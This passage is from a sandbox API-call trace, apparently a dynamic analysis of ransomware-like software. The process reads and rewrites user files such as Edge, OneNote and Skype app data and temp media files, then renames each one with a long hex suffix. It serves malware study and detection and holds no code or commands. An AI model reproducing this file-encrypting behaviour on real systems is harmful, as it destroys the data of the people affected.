lpOverlapped=0x28fff74) returned 1 [0116.456] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x28fff70) returned 0x0 [0116.456] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".4DCDB108AD760216D8AC6B86DEEDDCED342462492A4EE472821EF7E4D01B1851" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.4DCDB108AD760216D8AC6B86DEEDDCED342462492A4EE472821EF7E4D01B1851") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.4DCDB108AD760216D8AC6B86DEEDDCED342462492A4EE472821EF7E4D01B1851" [0116.456] GetProcessHeap () returned 0x600000 [0116.456] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x222) returned 0x3162da8 [0116.470] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x28fff60, FileInformation=0x3162da8, Length=0x222, FileInformationClass=0xa) returned 0x0 [0116.471] CloseHandle (hObject=0x31c) returned 1 [0116.471] GetProcessHeap () returned 0x600000 [0116.471] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.472] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.542] WriteFile (in: hFile=0x214, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0116.546] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.889] WriteFile (in: hFile=0x32c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0116.891] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0116.892] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x28fff70) returned 0x0 [0116.892] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".0C8B7E233AE0FDEED625099A2A2633583D49A01737ECA6DA5E0513E92B33572E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.0C8B7E233AE0FDEED625099A2A2633583D49A01737ECA6DA5E0513E92B33572E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.0C8B7E233AE0FDEED625099A2A2633583D49A01737ECA6DA5E0513E92B33572E" [0116.892] GetProcessHeap () returned 0x600000 [0116.892] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x224) returned 0x3184050 [0116.892] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3184050, Length=0x224, FileInformationClass=0xa) returned 0x0 [0116.893] CloseHandle (hObject=0x32c) returned 1 [0116.893] GetProcessHeap () returned 0x600000 [0116.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.895] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0117.421] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0117.439] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0117.505] WriteFile (in: hFile=0x214, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0117.547] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0118.108] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x28fff70) returned 0x0 [0118.109] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\settings.dat", lpString2=".A4699DCFA4FFDF99E9006B93CACC88ABAAE668B4638E0FDC32911BA816BFCD44" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\settings.dat.A4699DCFA4FFDF99E9006B93CACC88ABAAE668B4638E0FDC32911BA816BFCD44") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\settings.dat.A4699DCFA4FFDF99E9006B93CACC88ABAAE668B4638E0FDC32911BA816BFCD44" [0118.109] GetProcessHeap () returned 0x600000 [0118.109] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x184) returned 0x6b1618 [0118.109] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x28fff60, FileInformation=0x6b1618, Length=0x184, FileInformationClass=0xa) returned 0x0 [0118.240] CloseHandle (hObject=0x214) returned 1 [0118.240] GetProcessHeap () returned 0x600000 [0118.240] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.240] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0118.860] WriteFile (in: hFile=0x214, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x4200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0118.863] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0118.945] ReadFile (in: hFile=0x308, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0118.955] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0119.012] WriteFile (in: hFile=0x33c, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.013] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0119.049] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.050] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0119.060] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.060] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0119.074] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.074] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0119.093] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.094] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0119.102] WriteFile (in: hFile=0x334, lpBuffer=0x6a0480, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 0x0 [0119.103] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0119.131] ReadFile (in: hFile=0x33c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0119.131] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0119.140] ReadFile (in: hFile=0x328, lpBuffer=0x3310430, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8) returned 1 [0119.141] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.022] ReadFile (in: hFile=0x318, lpBuffer=0x3338588, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3318450 | out: lpBuffer=0x3338588*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3318450) returned 1 [0122.022] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.029] WriteFile (in: hFile=0x308, lpBuffer=0x33606e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x33405a8 | out: lpBuffer=0x33606e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x33405a8) returned 1 [0122.030] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.038] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.039] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.046] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x6400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.047] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.053] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.053] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.062] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.063] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.069] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.070] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.076] WriteFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0122.077] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.088] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.089] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.095] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.095] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.102] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.103] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.112] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.112] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.119] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.119] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\KfJl5xYmaYH.mp4", lpString2=".F0BAADB7610E1FEDEC426F32F72D2501B80AB094CD615413F61954F2B465043E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\KfJl5xYmaYH.mp4.F0BAADB7610E1FEDEC426F32F72D2501B80AB094CD615413F61954F2B465043E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\KfJl5xYmaYH.mp4.F0BAADB7610E1FEDEC426F32F72D2501B80AB094CD615413F61954F2B465043E" [0122.119] GetProcessHeap () returned 0x600000 [0122.119] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12e) returned 0x32a03f0 [0122.119] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a03f0, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0122.121] CloseHandle (hObject=0x308) returned 1 [0122.121] GetProcessHeap () returned 0x600000 [0122.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.122] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.130] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x6a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.130] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.133] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.134] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\LUA-Ln9ot j PGgqeebz.pdf", lpString2=".70AC12FF938D1378492A6C8998C29BD1899DAE7286827C5AF782A146BA311C52" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\LUA-Ln9ot j PGgqeebz.pdf.70AC12FF938D1378492A6C8998C29BD1899DAE7286827C5AF782A146BA311C52") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\LUA-Ln9ot j PGgqeebz.pdf.70AC12FF938D1378492A6C8998C29BD1899DAE7286827C5AF782A146BA311C52" [0122.134] GetProcessHeap () returned 0x600000 [0122.134] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x140) returned 0x32a0528 [0122.134] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a0528, Length=0x140, FileInformationClass=0xa) returned 0x0 [0122.135] CloseHandle (hObject=0x308) returned 1 [0122.135] GetProcessHeap () returned 0x600000 [0122.135] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.137] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.142] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.146] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.148] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.148] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\mgHwyg1y.bmp", lpString2=".DA656896465D6E63B3451F4FBDFA231ADB0D174A8D71506C4FE0E2D220EC9B1C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\mgHwyg1y.bmp.DA656896465D6E63B3451F4FBDFA231ADB0D174A8D71506C4FE0E2D220EC9B1C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\mgHwyg1y.bmp.DA656896465D6E63B3451F4FBDFA231ADB0D174A8D71506C4FE0E2D220EC9B1C" [0122.148] GetProcessHeap () returned 0x600000 [0122.148] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x128) returned 0x32a0670 [0122.149] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a0670, Length=0x128, FileInformationClass=0xa) returned 0x0 [0122.150] CloseHandle (hObject=0x308) returned 1 [0122.151] GetProcessHeap () returned 0x600000 [0122.151] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.151] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.154] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.155] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.156] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: 